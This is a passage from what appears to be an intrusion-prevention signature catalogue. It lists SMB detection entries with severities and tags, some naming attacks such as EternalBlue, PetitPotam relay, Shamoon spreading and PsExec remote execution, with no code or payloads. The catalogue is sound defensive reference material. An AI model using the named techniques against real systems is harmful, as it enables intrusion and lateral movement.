Vulnerability: Oracle-Sys-Pbsde-Init-BOF
Description:
Back to top

SMB-TCP_Out-Of-Bound-Memory-Read-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1691

About this situation: An attempt to exploit a vulnerability in ksmbd detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2022, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1541-5242
Last changed: sgpkg-ips-1542-5242
Vulnerability: Out-Of-Bound-Memory-Read-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1691
Description:
Back to top

SMB-TCP_PetitPotam-NTLM-Relay-Attack

About this situation: An attempt to execute the PetitPotam NTLM relay attack detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2021, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1823-5242
Vulnerability: PetitPotam-NTLM-Relay-Attack
Description:
Back to top

SMB-TCP_Possible-Shamoon-DistTrack-Spreading-Attempt

About this situation: Possible Shamoon/DistTrack spreading attempt
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-722-5211
Vulnerability: Shamoon-DistTrack-Malware
Description:
Back to top

SMB-TCP_PsExec-Named-Pipe-Detected

About this situation: A named pipe used by PsExec was detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1388-5242
Vulnerability: PsExec-Named-Pipe-Detected
Description:
Back to top

SMB-TCP_Samba-Authentication-Bypass

About this situation: Attempt to exploit authentication bypass vulnerability for unauthorized read only access
Context: TCP SMB Client Stream
Severity: 2
Tags: Linux, Any Hardware, Samba, CVE2009, Linux not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-409-4219
Vulnerability: Samba-Unauthorized-Read-Access-Via-Authentication-Bypass
Description:
Back to top

SMB-TCP_Samba-Mangling-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-454-4333
Vulnerability: Samba-Mangling-Method-Buffer-Overflow
Description:
Back to top

SMB-TCP_Samba-MS-RPC-Remote-Command-Execution

About this situation: An attempt to exploit a Samba MS-RPC Remote Command Execution vulnerability detected.
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-744-5211
Vulnerability: Samba-MS-RPC-Remote-Command-Execution
Description:
Back to top

SMB-TCP_Samba-Nmbd-Unstrcpy-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: TCP SMB Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-601-5211
Vulnerability: Samba-Nmbd-Unstrcpy-Buffer-Overflow
Description:
Back to top

SMB-TCP_Samba-Read_Nttrans_EA_List-Infinite-Allocation-Loop-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-544-5211
Vulnerability: Samba-Read_Nttrans_EA_List-Infinite-Allocation-Loop-Denial-Of-Service
Description:
Back to top

SMB-TCP_Samba-Remote-Code-Execution-From-Writable-Share

About this situation: An attempt to exploit a Samba Remote Code Execution From Writable Share vulnerability detected.
Context: TCP SMB Client Stream
Severity: 10
Tags: Linux, Any Hardware, Samba, CVE2017, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-914-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Samba-Remote-Code-Execution-From-Writable-Share
Description:
Back to top

SMB-TCP_Samba-Remote-Code-Execution-From-Writable-Share-2

About this situation: An attempt to exploit a Samba Remote Code Execution From Writable Share vulnerability detected.
Context: TCP SMB Client Stream
Severity: 10
Tags: Linux, Any Hardware, Samba, CVE2017, Linux not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-926-5242
Last changed: sgpkg-ips-1147-5242
Vulnerability: Samba-Remote-Code-Execution-From-Writable-Share
Description:
Back to top

SMB-TCP_Samba-Root-File-System-Access-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2009, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-358-4219
Last changed: sgpkg-ips-500-5211
Vulnerability: Samba-Root-File-System-Access-Security-Bypass
Description:
Back to top

SMB-TCP_Samba-Security-Descriptor-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Unix, Any Hardware, Samba, CVE2004, Unix not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Samba-Security-Descriptor-Parsing-Integer-Overflow
Description:
Back to top

SMB-TCP_Samba-Sid-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-359-4219
Last changed: sgpkg-ips-514-5211
Vulnerability: Samba-Sid-Parsing-Stack-Buffer-Overflow
Description:
Back to top

SMB-TCP_Samba-smbd-Daemon-Symlink-Verification-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-818-5242
Last changed: sgpkg-ips-818-5242
Vulnerability: Samba-smbd-Daemon-Symlink-Verification-Information-Disclosure
Description:
Back to top

SMB-TCP_Samba-smdb-Packets-Chaining-AndX-Offset-Infinite-Loop

About this situation: An attempt to exploit a vulnerability in Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-446-4219
Vulnerability: Samba-smbd-Packets-Chaining-AndX-Offset-Infinite-Loop
Description:
Back to top

SMB-TCP_Samba-Spotlight-Mdssvc-RPC-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: Samba-Spotlight-Mdssvc-RPC-Denial-Of-Service
Description:
Back to top

SMB-TCP_Samba-Spotlight-Mdssvc-RPC-Request-Type-Confusion-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Vulnerability: Samba-Spotlight-Mdssvc-RPC-Request-Type-Confusion-Denial-Of-Service
Description:
Back to top

SMB-TCP_Samba-Unicode-Filename-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Samba-Unicode-Filename-Buffer-Overflow
Description:
Back to top

SMB-TCP_SC-At-Scheduler-JobAdd

About this situation: An attempt to add a job remotely detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

SMB-TCP_SC-At-Scheduler-JobDelete

About this situation: An attempt to delete a job remotely detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

SMB-TCP_SC-Remote-Create-Service

About this situation: An attempt to create a service remotely detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1544-5242
Description:
Back to top

SMB-TCP_SC-Remote-Delete-Service

About this situation: An attempt to delete a service remotely detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

SMB-TCP_SC-Remote-Start-Service

About this situation: An attempt to start a service remotely detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

SMB-TCP_SC-Remote-Stop-Service

About this situation: An attempt to stop a service remotely detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Description:
Back to top

SMB-TCP_Shared-Variable-Fingerprint

About this situation: This fingerprint sets shared variables
Context: TCP SMB Client Stream
Severity: 6
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-32-1210
Last changed: sgpkg-ips-1767-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

SMB-TCP_SHS-Check-Directory-Fail

About this situation: Unsuccessful Samba Check Directory reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Check-Directory-Success

About this situation: Successful Samba Check Directory reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Close-Fail

About this situation: Unsuccessful Samba Close reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Close-Print-File-Fail

About this situation: Unsuccessful Samba Close Print File reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Close-Print-File-Success

About this situation: Successful Samba Close Print File reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Close-Success

About this situation: Successful Samba Close reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Copy-Fail

About this situation: Unsuccessful Samba Copy reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Copy-Success

About this situation: Successful Samba Copy reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Create-Directory-Fail

About this situation: Unsuccessful Samba Create Directory reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Create-Directory-Success

About this situation: Successful Samba Create Directory reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Create-Fail

About this situation: Unsuccessful Samba Create reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Create-New-Fail

About this situation: Unsuccessful Samba Create New reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Create-New-Success

About this situation: Successful Samba Create New reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Create-Success

About this situation: Successful Samba Create reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Create-Temporary-Fail

About this situation: Unsuccessful Samba Crate Temporary reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Create-Temporary-Success

About this situation: Successful Samba Crate Temporary reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Delete-Directory-Fail

About this situation: Unsuccessful Samba Delete Directory reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Delete-Directory-Success

About this situation: Successful Samba Delete Directory reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Delete-Fail

About this situation: Unsuccessful Samba Delete reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Delete-Success

About this situation: Successful Samba Delete reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Echo-Response-Success

About this situation: SMB echo response detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-350-4219
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-EternalBlue-Probe

About this situation: EternalBlue probing communication
Context: SMB Server Header Stream
Severity: 10
Tags: Any Operating System, Any Hardware, MS2017-03, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-905-5242
Last changed: sgpkg-ips-909-5242
Vulnerability: EternalBlue-Probe
Description:
Back to top

SMB-TCP_SHS-Find-Close-Fail

About this situation: Unsuccessful Samba Find reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Close-Success

About this situation: Successful Samba Find reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Close2-Fail

About this situation: Unsuccessful Samba Find Close2 reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Close2-Success

About this situation: Successful Samba Find Close2 reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Fail

About this situation: Unsuccessful Samba Find reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Notify-Close-Fail

About this situation: Unsuccessful Samba Find Notify Close reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Notify-Close-Success

About this situation: Successful Samba Find Notify Close reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Success

About this situation: Successful Samba Find reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Unique-Fail

About this situation: Unsuccessful Samba Find reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Find-Unique-Success

About this situation: Successful Samba Find reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Flush-Fail

About this situation: Unsuccessful Samba Flush reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Flush-Success

About this situation: Successful Samba Flush reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Get-Print-Queue-Fail

About this situation: Unsuccessful Samba Get Print Queue reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Get-Print-Queue-Success

About this situation: Successful Samba Get Print Queue reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Invalid-Command-Fail

About this situation: Unsuccessful Samba Invalid Command reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Invalid-Command-Success

About this situation: Successful Samba Invalid Command reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-IOCTL-Fail

About this situation: Unsuccessful Samba IOCTL reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-IOCTL-Secondary-Fail

About this situation: Unsuccessful Samba IOCTL reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-IOCTL-Secondary-Success

About this situation: Successful Samba IOCTL reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-IOCTL-Success

About this situation: Successful Samba IOCTL reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Lock-And-Read-Fail

About this situation: Unsuccessful Samba Lock And Read reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Lock-And-Read-Success

About this situation: Successful Samba Lock And Read reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Lock-Byte-Range-Fail

About this situation: Unsuccessful Samba Lock Byte Range reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Lock-Byte-Range-Success

About this situation: Successful Samba Lock Byte Range reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Locking-AndX-Fail

About this situation: Unsuccessful Samba Locking AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Locking-AndX-Success

About this situation: Successful Samba Locking AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Logoff-AndX-Fail

About this situation: Unsuccessful Samba Logoff AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Logoff-AndX-Success

About this situation: Successful Samba Logoff AndX reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Microsoft-Windows-SMB-Client-Transaction-BOF-MS05-011

About this situation: An exploit against CVE-2005-0045 detected
Context: SMB Server Header Stream
Severity: 7
Tags: Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows 2003 SP0, Windows XP SP1, Windows XP SP0, Windows XP SP2, Any Hardware, MS2005-02, CVE2005, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-423-4219
Last changed: sgpkg-ips-631-5211
Vulnerability: MS-Windows-SMB-Transaction-BOF-MS05-011
Description:
Back to top

SMB-TCP_SHS-Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28324

About this situation: Information disclosure from SMB server
Context: SMB Server Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2021-04, CVE2021, Windows not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1339-5242
Last changed: sgpkg-ips-1346-5242
Vulnerability: Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28324
Description:
Back to top

SMB-TCP_SHS-Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28325

About this situation: An attempt to exploit an information dislosure vulnerability detected
Context: SMB Server Header Stream
Severity: 2
Tags: Windows, Any Hardware, MS2021-04, CVE2021, Windows not specific, Potential Disclosure
First detected in: sgpkg-ips-1339-5242
Last changed: sgpkg-ips-1370-5242
Vulnerability: Microsoft-Windows-SMB-Information-Disclosure-Vulnerability-CVE-2021-28325
Description:
Back to top

SMB-TCP_SHS-Move-Fail

About this situation: Unsuccessful Samba Move reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Move-Success

About this situation: Successful Samba Move reply was detected
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_SHS-Multiple-Tree-Connections

About this situation: An unusual situation in an SMB session
Context: SMB Server Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: SMB-Multiple-Tree-Connections
Description:
Back to top

SMB-TCP_SHS-Negotiate-Protocol-Response-Fail

About this situation: SMB negotiate protocol response fail detected
Context: SMB Server Header Stream
Severity: 1
